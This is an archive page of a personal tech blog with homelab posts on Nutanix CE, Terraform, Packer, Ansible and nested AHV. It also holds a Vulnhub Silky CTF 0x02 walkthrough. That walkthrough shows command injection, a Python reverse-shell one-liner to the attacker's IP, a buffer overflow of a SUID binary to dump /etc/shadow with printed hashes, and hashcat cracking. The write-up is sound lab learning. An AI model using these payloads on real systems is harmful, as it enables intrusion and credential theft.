Thursday, 3 August 2023

Nutanix CE 2.0 on ESXi AOS Upgrade Hangs

AOS Upgrade on ESXi from 6.5.2 to 6.5.3.6 hangs.

Issue

I have tried to upgrade my Nutanix CE 2.0 based on ESXi to a newer AOS version for a while and it has caused issues. After kicking off the upgrade, LCM starts a root task which hangs at 60%. The AOS upgrade for each node shows as cancelled in the tasks view and LCM stops responding.

Symptoms

  • LCM Root Task hung at 60%
  • LCM Tasks for each CVM upgrade showing as “Cancelled”
  • Running lcm_leader on a CVM returns no leader “lcm leader is at none”
  • Trying to open LCM on Prism Elements shows “loading”

test4

Investigation

/home/nutanix/data/logs/install.out shows that SCSI passthrough is no longer supported. “SCSI passthrough on ESX is no longer supported in NOS 4.5+”

test2

Workaround

Comment out the check for SCSI passthrough in the installer script - /home/nutanix/data/installer/<version string>/bin/svm_upgrade - on each CVM, save, then wait. The exact location can be found in the install.out log file from above.

test3

LCM should kick back in to life and the install should complete as normal.

test5

Tailing the /home/nutanix/data/logs/install.out file shows the install now continues

test6

Once complete the new version is shown in the About Nutanix dialog.

test

Written with StackEdit.

Tuesday, 18 April 2023

Terraform, Nutanix AHV and Windows

Deploy a Windows Template using Terraform to Nutanix AHV

If you just want the template, check the github repo.

This post assumes you already have a Windows image for your desired Server OS. The Autounattend.xml included here should work fine on Server 2016 through 2022 and will need some tweaks for a client OS.

I build my AHV images using Packer and have one for each OS type. The Terraform template assumes your image is using UEFI boot, but could easily be modified for BIOS boot. You will need to modify main.tf to add your image name to the map, or copy your template and name it the same as mine - efi-rf2-2022-packer - for instance.

Your image must be sysprepped. 

# Select the correct image and product key
variable "images" {
  type = map(any)
  default = {
    "2016"      = "efi-rf2-2016-packer"
    "2016-core" = "efi-rf2-2016-core-packer"
    "2019"      = "efi-rf2-2019-packer"
    "2019-core" = "efi-rf2-2019-core-packer"
    "2022"      = "efi-rf2-2022-packer"
    "2022-core" = "efi-rf2-2022-core-packer"
  }
}

The image name in Nutanix for my 2022 server template is efi-rf2-2022-packer so if you just want to quickly test, replace the image you already have in the map, e.g… "2022" = "myServerTemplate"

The os variable in terraform.tfvars maps into the table above (and also the product key map.)

Breaking down the template

Taking a look at the main.tf file, the first section tells terraform that we need the Nutanix module

terraform {
  required_providers {
    nutanix = {
      source = "nutanix/nutanix"
    }
  }
}

The next part sets up the connection to the Nutanix endpoint - Prism Central or Elements - pulling variables from our terraform.tfvars. Once connected, the data section gets the UUID of the first cluster. Since I’m connecting directly to Prism Elements, that’s all that is needed for me. If you’re connecting to Prism Central you may need to include additional variables for the cluster.

# Connection Variables
provider "nutanix" {
  endpoint     = var.nutanix_endpoint
  port         = var.nutanix_port
  insecure     = var.nutanix_insecure
  wait_timeout = var.nutanix_wait_timeout
}

# Get Cluster uuid
data "nutanix_clusters" "clusters" {
}
locals {
  cluster1 = data.nutanix_clusters.clusters.entities[0].metadata.uuid
}

The next section is a couple of maps which serve as a lookup table to convert the os variable into other useful variables for later use. if os is 2022, then image_name = var.images[var.os] sets the image_name to efi-rf2-2022-packer.

# Select the correct image and product key
variable "images" {
  type = map(any)
  default = {
    "2016"      = "efi-rf2-2016-packer"
    "2016-core" = "efi-rf2-2016-core-packer"
    "2019"      = "efi-rf2-2019-packer"
    "2019-core" = "efi-rf2-2019-core-packer"
    "2022"      = "efi-rf2-2022-packer"
    "2022-core" = "efi-rf2-2022-core-packer"
  }
}

# These are KMS keys available from Microsoft at:
# https://learn.microsoft.com/en-us/windows-server/get-started/kms-client-activation-keys
variable "product_keys" {
  type = map(any)
  default = {
    "2016"      = "CB7KF-BWN84-R7R2Y-793K2-8XDDG"
    "2016-core" = "CB7KF-BWN84-R7R2Y-793K2-8XDDG"
    "2019"      = "WMDGN-G9PQG-XVVXX-R3X43-63DFG"
    "2019-core" = "WMDGN-G9PQG-XVVXX-R3X43-63DFG"
    "2022"      = "WX4NM-KYWYW-QJJR4-XV3QB-6VM33"
    "2022-core" = "WX4NM-KYWYW-QJJR4-XV3QB-6VM33"
  }
}

data "nutanix_image" "disk_image" {
  image_name = var.images[var.os]
}

This just gets the nutanix subnet using the name supplied in the variable

#pull desired subnet data
data "nutanix_subnet" "subnet" {
  subnet_name = var.subnet_name
}

This is the interesting bit, the template_file section is what injects variables into the Autounnatend.xml for autologon, domain join and executes a ps1 script from your webserver for onward configuration of the system.

Right now, it’s obfuscates the local admin password, but the domain join password is added in plain text. There is an option to obfuscate this using the AccountData xml section instead, but it’s still easily reversible.

On security, this xml file is added to a CD-ROM image attached to the new VM, and will be left mounted. You should have your first run script eject the CD-ROM so that the passwords contained in it are removed.

If you’ve not used Terraform before, then the state files that it creates are also considered to be sensitive since they will contain usernames, passwords etc. If you’re planning to do this in production then investigate using remote state.

# Unattend.xml template
data "template_file" "autounattend" {
  template = file("${path.module}/Autounattend.xml")
  vars = {
    ADMIN_PASSWORD       = textencodebase64(join("", [var.admin_password, "AdministratorPassword"]), "UTF-16LE")
    AUTOLOGON_PASSWORD   = textencodebase64(join("", [var.admin_password, "Password"]), "UTF-16LE")
    ORG_NAME             = "Terraform Org"
    OWNER_NAME           = "Terraform Owner"
    TIMEZONE             = var.timezone
    PRODUCT_KEY          = var.product_keys[var.os]
    VM_NAME              = var.vm_name
    AD_DOMAIN_SHORT      = var.domain_shortname
    AD_DOMAIN            = var.domain
    AD_DOMAIN_USER       = var.domain_user
    AD_DOMAIN_PASSWORD   = var.domain_pw
    AD_DOMAIN_OU_PATH    = var.ou_path
    FIRST_RUN_SCRIPT_URI = var.first_run_script_uri
  }
}

Next is the main virtual machine resource section, VM settings are hard coded here but can be parameterised easily.

# Virtual machine resource
resource "nutanix_virtual_machine" "virtual_machine_1" {
  # General Information
  name                 = var.vm_name
  description          = "Terraform Test VM"
  num_vcpus_per_socket = 4
  num_sockets          = 1
  memory_size_mib      = 8192
  boot_type            = "UEFI"

  guest_customization_sysprep = {
    install_type = "PREPARED"
    unattend_xml = base64encode(data.template_file.autounattend.rendered)
  }

  # VM Cluster
  cluster_uuid = local.cluster1

  # What networks will this be attached to?
  nic_list {
    subnet_uuid = data.nutanix_subnet.subnet.id
  }

  # What disk/cdrom configuration will this have?
  disk_list {
    data_source_reference = {
      kind = "image"
      uuid = data.nutanix_image.disk_image.id
    }
  }

  disk_list {
    # defining an additional entry in the disk_list array will create another.
    disk_size_mib   = 10240
  }
}

The last bit just outputs the IP of the new machine

# Show IP address
output "ip_address" {
  value = nutanix_virtual_machine.virtual_machine_1.nic_list_status[0].ip_endpoint_list[0].ip
}

And for completeness, here’s the Autounattend.xml template

Building a VM

To get started, install terraform and make sure it’s available in your path. I’m using Windows / PowerShell for this but it shouldn’t matter if you’re on another OS for your build host.

Clone the repo

git clone https://github.com/bobalob/tf-nutanix

Modify the example terraform.tfvars file with your settings.

Set environment variables for usernames/passwords so they aren’t stored in plain text! Make sure to escape any PowerShell specific characters like $ and `. If automating this step, consider using a password vault solution like Azure Key Vault.

Make sure you’re in the right folder and run terraform init. This will download the required plugins and get you ready to run.

If this looks okay, run terraform plan

Again, if this looks OK you can apply with terraform apply

And here’s the script from the webserver executing

Have fun!

Written with StackEdit.

Tuesday, 7 March 2023

Ubuntu with packer on vSphere

Building Ubuntu Server 22.04 on vSphere with Packer

While using my home lab, I regularly need a fresh Ubuntu Server to install test software. Rather than use the built in templating in vSphere, I wanted to use Packer to build an image so that I can include the regular software I use and have it always be up to date when I start using the server.

I initially built the template using JSON, but since HCL is now the preferred language, I converted the template to HCL and used some new features like dynamic blocks. I’ve parameterised all of the vSphere values and included some values to be injected into the VM such as username, initial user password and some ssh keys in authorized_keys for the user.

If you want to follow along, clone the git repo…

git clone https://github.com/bobalob/packer-vsphere

cloning the repo

…and install packer. if this isn’t available on your distribution, download from hashicorp

sudo apt install packer

install packer

Here’s the main template. The source section defines the virtual machine ready to boot in vSphere and the build section defines what will happen after the OS has been installed.

The boot_command sends keys to the VM via the remote console and essentially types a boot command into the grub boot menu. This instructs the machine to load the user-data file from packer’s in built dynamic HTTP server. The user-data file has some basic information for subiquity (Ubuntu Server’s setup program) to install the OS.

The dynamic provisioner block is interesting since it iterates over the ssh_authorized_keys list variable and runs the echo | tee command multiple times inside the new VM.

Some of the variables in the user-data file are modified by build.sh prior to packer being executed, which I’ll show a bit later.

The template uses variables for most user input so it can be used in other environments

To provide user variables, a file named variables.auto.pkrvars.hcl can be placed in the files/ directory. SSH public keys can be placed in the ssh_authorized_keys variable which will be injected into the VM in the build step. An example variables.auto.pkrvars.hcl file:

temp_dns = "192.168.2.254"
temp_gw = "192.168.2.254"
temp_ip = "192.168.2.90"
temp_mask = "255.255.255.0"
vcenter_cluster = "mycluster.domain.local"
vcenter_datacenter = "Home"
vcenter_datastore = "Datastore1"
vcenter_iso_path = "[Datastore1] ISO/ubuntu-22.04.1-live-server-amd64.iso"
vcenter_network = "VM network"
vcenter_server = "vcenter.domain.local"
vcenter_user = "administrator@vsphere.local"
ssh_authorized_keys = [
    "ssh-rsa AAAAB3NzaC1... user@box1",
    "ssh-rsa AAAAB3NzaC1... user@box2"
]

The temporary IP is because in my environment, the machine would get a different DHCP assigned address after the first reboot and packer would not reconnect to the new IP.

Running build.sh modifies some files in the user-data file that Ubuntu reads during setup. openssl generates a password hash for the user supplied password and there is a read command for the vCenter password so it’s not entered on the command line or echoed to the screen.

And finally, here’s the provision.sh script that runs inside the VM once it’s built. The provision script just does an apt update/upgrade, cleans up the cloud-init configuration from the installer, expires the user’s password and resets it’s sudo configuration.

Building the machine

Running build.sh

running build.sh

packer typing the boot command

packer typing boot command

build section of the template running. Notice that the ssh-rsa public keys are echoed twice, this is because of the dynamic block in the build section of the template iterating over the list of keys provided in the variable.

packer running the build

Once the machine is built, login with my ssh key is possible. Since provision.sh expired the user password, we’re prompted to change from the initial password at first login.

logging into the finished machine

I already have Ansible set up in my home lab, so I’ll try to integrate that into this build in the future.

Written with StackEdit.

Sunday, 26 June 2022

Vulnhub Writeup: Silky CTF 0x02

Vulnhub Writeup - Silky CTF 0x02

This is the first box on the OSWE track from TJNull’s infamous list

You can download the box from Vulnhub

Initial Scans

nmap -sn 192.168.21.0/24

Running AutoRecon on the box

sudo $(which autorecon) -vv 192.168.21.129

Open Ports

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))

Web site enumeration

There is a default Debian index page

Reviewing the feroxbuster log from AutoRecon on the machine reveals an admin.php page.

feroxbuster -u http://192.168.21.129:80/ -t 10 -w /root/.config/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e 

/admin.php

Clicking the login button shows a basic login panel

An invalid user / password combination reults in the following error in German

“Falscher Nutzernamen oder falsches Passwort”

Translation

Fuzzing the login form

While testing the login page, I tried a basic WFUZZ to see if there are any differences in response when trying different usernames.

wfuzz -u "http://192.168.21.129/admin.php?username=FUZZ&password=test" -w /usr/share/wordlists/fasttrack.txt

The results show that the username trust gives a different sized page response which is interesting.

Trying that name in a browser shows a strange error. Looks like it could be running trust as a command.

Let’s try another linux command - id

Nice, so it appears this is straight command injection! Trying which python results in the page showing the location of the python binary, so let’s try a python reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.21.128",1998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

On the attacker machine, I have set up a netcat listener with nc -lvnp 1998. Clicking Login on the login form initiates the reverse shell and a quick enumeration of the home folder shows we have read access to the user flag.

I can also see a SUID binary named cat_shadow which seems to suggest it will allow a normal user to read the /etc/shadow file!

Running ./cat_shadow shows the executable is expecting a password

At this point, I upgrade the shell to a proper TTY which allows entering longer strings on the command line and responding to input request from programs

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color

I run strings cat_shadow > cat_strings.txt to see if there is anything really obvious in the binary that looks like it could be a password.

The password might be 0x496c5962

Reading each hex pair in 0x496c5962 looks like it could be ASCII characters which would translate to “IlYb”

Buffer overflow testing

Trying different passwords on the executable, cat_shadow gives some easy hints as to what’s happening. 0x00000000 != 0x496c5962 suggests the program is reading a memory location and comparing it’s contents to the magic value 0x496c5962. So I try longer and longer strings of ‘A’ characters to try to overflow the buffer and overwrite the memory location that it is checking. Once the value becomes 0x41414141 or ‘AAAA’ then I change the end characters to ‘BBBB’ to confirm the correct memory location is being overwritten.

Trying with ‘BBBB’ and ‘CCCC’ to confirm the correct location is being overwritten.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC

Trying with the magic ASCII value calculated earlier.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIlYb

Since x86 is little endian, then the characters need to be reversed.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI

And we get the shadow file!

The shadow file contains the user password hashes, so I can either crack the password or try find a further bug in cat_shadow to change it’s behaviour.

root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::
silky:$6$F0T5vQMg$BKnwGPZ17UHvqZLOVFVCUh6CrsZ5Eu8BLT1/uX3h44wtEoDt9qA2dYL04CMUXHw2Km9H.tttNiyaCHwQQ..2T0:18012:0:99999:7:::

Password Hash Cracking

I’ll try to crack the hashes. Reviewing the example_hashes for hashcat shows that these are type 1800, “sha512crypt $6$, SHA512 (Unix)”

Here is the hashcat command from my Windows machine, simply paste the lines from the shadow file into a file named silky.hashes:

.\hashcat -a 0 -m 1800 --username .\silky.hashes .\wordlists\rockyou.txt

And we get the password! Since the shell was upgraded to a tty earlier, it’s possible to use su and type the password.

Up to ten kilograms of cocoons are needed to obtain one kilogram of raw silk.

congratulation

And that’s the box.

Written with StackEdit.

Sunday, 19 June 2022

Ansible as fast as possible

Super quick start guide for Ansible. This is a getting started guide only and should be sufficient to get you started writing playbooks for your lab environment. Before moving to production, security should be considered for the user account and roles should be reviewed for anything unexpected.

With that said:

sudo apt install ansible
cd ~
mkdir ansible
cd ansible

The inventory

The inventory is a list of machines which ansible will run on. Machines can be grouped and groups can be nested. The inventory file can be generated dynamically or statically as an ini or yaml formatted file. Here is a basic ini formatted inventory file with a few hosts in the production and test groups.

I have assigned the ‘syslocation’ variable to the machines which can be used later. Click here for more information on inventory files, and here for more information on variables.

inventory.ini

[production]
server1.example.com syslocation="London, England"
server2.example.com syslocation="London, England"
[test]
server3.example.com
server4.example.com

SSH Access to machines

Before you can start pushing configuration to your inventory, you’ll need a user account that can access the machines, generally with root level privileges. For the lab setup we will create an ansible user which has passwordless sudo using an SSH key for access.

Create an ssh key on your control node, save the keys somewhere and update the bootstrap-ansible.yml below with the public key location

ssh-keygen

bootsrap-ansible.yml

- name: Ansible user account bootstrapping
  hosts: all
  become: yes
  vars:
    user_name: ansible

  tasks:
  
  - name: Make sure we have a 'wheel' group
    group:
      name: wheel
      state: present
      
  - name: Add the {{ user_name }} user
    user:
      name: "{{ user_name }}"
      shell: /bin/bash
      home: "/home/{{ user_name }}"
      groups: wheel
      append: yes
      createhome: yes
      state: present
      
  - name: Allow 'wheel' group to have passwordless sudo
    lineinfile:
      dest: /etc/sudoers
      state: present
      regexp: '^%wheel'
      line: '%wheel ALL=(ALL) NOPASSWD: ALL'
      validate: 'visudo -cf %s'
      
  - name: Set up authorized keys for the ansible user
    authorized_key:
      user: "{{ user_name }}"
      key: "{{ item }}"
    with_file:
      - /home/dave/ansible/id_rsa.pub 
      # Public key location goes above

The above file combines several Ansible modules into a playbook. The modules will create the user, allow passwordless sudo and assign our control node’s public key for SSH access.

Once you’ve created the bootstrap playbook and inventory, run the bootstrap playbook with -i inventory.ini -k -K -u username using a known sudo account in order to push the ansible user to each machine. Rerun the command as many times as needed with different credentials. If you’re connecting directly as root, omit the -K flag.

ansible-playbook -i ./inventory.ini ./bootstrap-ansible.yml -k -K -u <remote_sudo_user>

You can limit the above command to a single host by appending -l hostname.exmaple.com, (note trailing comma)

The command will fail for all machines that don’t have the user/password you are using each time you run the command but once you’ve covered each machine at least once, you’ll have a new user that can be used.

Now that all your machines in the inventory have an ansible user with passwordless sudo capability, copy /etc/ansible/ansible.cfg to your working ansible directory and update the following values.

inventory = /home/<you>/ansible/inventory.ini
remote_user = ansible
private_key_file = /home/<you>/ansible/id_rsa

Run ansible --version to make sure you are using the new config file

Run the ping module command for all inventory to confirm connectivity (my screenshot is limited to a smaller group of machines called test_group)

ansible all -m ping

Now we can create a simple config yaml to install snmpd and copy a jinja2 file template to configure the snmpd service.

Create 2 files - configure_snmp.yml and snmpd.conf.j2

snmpd.conf.j2

agentAddress udp:161
rocommunity superSecretCommunity  192.168.55.55
rocommunity superSecretCommunity  127.0.0.1
sysLocation    {{ syslocation }}
sysContact     Dave <no@thanks.com>

Note the syslocation variable from earlier in the inventory file. Varibles can be assigned in many places such as the inventory, playbooks, for specific groups etc.

configure_snmp.yml

- name: Configure snmp
  hosts: test_group
  become: yes
  vars:
    # Dynamic list based on OS type
    _packages:
      Debian:
        - snmpd
      RedHat:
        - net-snmp
    packages: "{{ _packages[ansible_os_family] }}"

    # Standard list
    services:
        - snmpd
        - sshd

  tasks:

  # Package module to install list of packages apt / yum
  - name: Install Packages
    package:
      name: "{{ packages }}"
      state: present

  # Use the jinja2 template to create a new snmpd.conf
  - name: snmpd conf file
    template:
      src: "/home/dave/ansible/snmpd/snmpd.conf.j2"
      dest: "/etc/snmp/snmpd.conf"
      backup: yes
      owner: root
      group: root
      mode: 0600
    notify:
      - restart snmpd

  # Loop over services list and make sure they are started and enabled
  - name: Ensure services are enabled
    ansible.builtin.service:
      name: "{{ item }}"
      state: started
      enabled: yes
    loop: "{{ services }}"

  handlers:

  # Handler called if the snmpd conf file is changed from template module above
  - name: restart snmpd
    ansible.builtin.service:
      name: snmpd
      state: restarted

Run a dry-run on the playbook to see what happens

ansible-playbook -C ./snmp/configure-snmp.yml

Because this is a dry run it will fail to start the snmpd service as it’s not yet installed. Run the playbook without a dry run to actually configure the services

ansible-playbook ./snmp/configure-snmp.yml

If we run it a second time, all should be in order and no changes will be required

ansible-playbook ./snmp/configure-snmp.yml

You can check out Ansible Galaxy for pre-written Ansible Roles to save time writing playbooks that the community has already written. For example there are roles on Ansible Galaxy for unattended-upgrades for Debian based machines, dnf-automatic for updates on red hat based machines and many other configurations.

For more information check out the Ansible Docs

If you’re interested and have the time, I recommend this Pluralsight course. You can get 1 month of free access to Pluralsight with Visual Studio Dev Essentials.

Written with StackEdit.

Friday, 29 October 2021

AHV nested inside Hyper-V

AHV in Hyper-V

AHV Running as a Hyper-V Guest VM

Want to test out Nutanix Community Edition but don’t have the hardware handy? If you have a decent Hyper-V host then it’s possible to install CE inside a guest VM in Hyper-V.

Unfortunately the ISO you can download direct from Nutanix fails when checking for network interfaces during the install. Attempting to install straight from the ISO with regular or legacy NICs results in the following error:

FATAL An exception was raised: Traceback (most recent call last):
  File "./phoenix", line 125, in <module>
   main()
  File "./phoenix", line 84, in main
    params = gui.get_params(gui.CEGui)
  File "/root/phoenix/gui.py", line 1805, in get_params
    sysUtil.detect_params(gp.p_list, throw_on_fatal=False, skip_esx_info=True)
  File "/root/phoenix/sysUtil.py", line 974, in detect_params
    param_list.cluster_id = get_cluster_id()
  File "/root/phoenix/sysUtil.py", line 974, in get_cluster_id
    cluster_id = int(randomizer + mac_addrs[0].replace(':',''), 16)
IndexError: list index out of range

CE NIC Error

It is however possible to modify the installer so it can detect Hyper-V guest network interfaces and successfully install and start a new single node cluster.

The requirements for the guest VM are not insignificant, so you’ll need the following.

VM Specification

  • Generation 1 VM (BIOS Boot)
  • 4+ vCPU Cores (I have tested with 8)
  • 22 GB+ RAM, Statically Assigned
  • 3 Dynamically Expanding VHDs attached to IDE interface
    • 32 GB AHV Boot Disk
    • 256 GB CVM & Data (Must be SSD backed)
    • 512 GB Data Disk
  • Nested Virtualisation enabled on the VM
  • At least one NIC, enable MAC address spoofing so that the CVM and guest VMs can get out to the network.

VM Settings Dialog


Start by downloading the ce-2020.09.16.iso from the Nutanix Community Edition forum (Requires Registration.)

Patch the iso using the script. I used a fresh, temporary Ubuntu 20.04 server VM to patch the iso. It’s possible this script would work in WSL but I haven’t tested that. The script just modifies a few lines in some of the setup python scripts. You may be able to do this manually but it requires unpacking and repacking the initrd file on the ISO in a very specific way.

This is an alpha grade script, so use at your own risk. I created an Ubuntu Server 20.04 temporary VM and copied the iso into the VM.

The script has some pre-requesites to install.

sudo apt install genisoimage

Then copy your downloaded ce-2020.09.16.iso file to the iso directory and run the script.

git clone https://github.com/bobalob/ahv-on-hyperv
mkdir ./ahv-on-hyperv/iso
cp ~/Downloads/ce-2020.09.16.iso ./ahv-on-hyperv/iso/
cd ahv-on-hyperv/
chhmod +x patch.sh
./patch.sh

Pre Patching

Once finished it should look a bit like this.

Patched

If your Ubuntu machine has KVM/QEMU installed it will boot the ISO, this is expected to fail as there are no disks attached. You can safely stop the VM. Once patched copy the new ce-2020.09.16-hv-mkiso.iso from your Ubuntu machine to your Hyper-V host.

Create a new virtual machine with the above specification, then enable nested virtualisation with the following command

Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true

Attach the patched ISO ce-2020.09.16-hv-mkiso.iso and boot the VM.

Booting the VM

Installation

Follow the normal path to install

Installation 1

Installation 2

Install Complete

Installation Complete

Prism Running!

Remove the ISO from the VM and reboot when told; give it 15-20 minutes to start up. Enjoy your new dev AHV/AOS installation.

CVM is UP!

Prism is UP!

Written with StackEdit.

Nutanix CE 2.0 on ESXi AOS Upgrade Hangs

AOS Upgrade on ESXi from 6.5.2 to 6.5.3.6 hangs. Issue I have tried to upgrade my Nutanix CE 2.0 based on ESXi to a newer AOS version for ...